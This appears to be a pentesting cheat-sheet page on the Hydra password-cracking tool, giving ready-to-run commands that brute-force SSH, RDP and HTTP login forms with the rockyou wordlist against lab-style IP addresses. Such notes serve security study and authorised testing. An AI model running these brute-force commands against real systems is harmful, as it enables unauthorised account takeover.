โœ…Hydra

Hydra is a brute force online password cracking program

Introduction

  • Hydra is a brute force online password cracking program, a quick system login password โ€œhackingโ€ tool.

  • The options we pass into Hydra depend on which service (protocol) weโ€™re attacking.

Commands

  • sudo hydra -l <User Name> -P <Password List> <Service Name(i.e. ssh or ftp)>://<Target IP Address> - Brute forces the specified service using the specified username and wordlist.

    • Example 1 : sudo hydra -l molly -P /usr/share/wordlists/rockyou.txt ssh://10.10.161.54 - Brute forces SSH on the default port 22.

    • Example 2: sudo hydra -l george -P /usr/share/wordlists/rockyou.txt -s 2222 ssh://192.168.50.201 - Brute forces SSH on port 2222 (-s is used to specify the port number)

    • Example 3: sudo hydra -L /usr/share/wordlists/dirb/others/names.txt -p "SuperS3cure1337#" rdp://192.168.50.202 - Brute forces RDP on its default port number, using a username list and a single password.

  • sudo hydra <Target IP Address> http-post-form ":<username>=^USER^&<password>=^PASS^>:<Invalid Response> - Brute forces the specified service using the specified username and wordlist.

    • Example 1: sudo hydra -l molly -P /usr/share/wordlists/rockyou.txt 10.10.161.54 http-post-form "/login:username=^USER^&password=^PASS^:Your username or password is incorrect." -V - Brute force an HTTP login form that passes the 2 arguments username and password using the username molly and rockyou password list.

    • Example 2: sudo hydra -l user -P /usr/share/wordlists/rockyou.txt 192.168.50.201 http-post-form "/index.php:fm_usr=user&fm_pwd=^PASS^:Login failed. Invalid" - Brute force an HTTP login form that passes the 2 argument fm_usr and fm_pwd

PreviousFfufNextJohn The Ripper

Last updated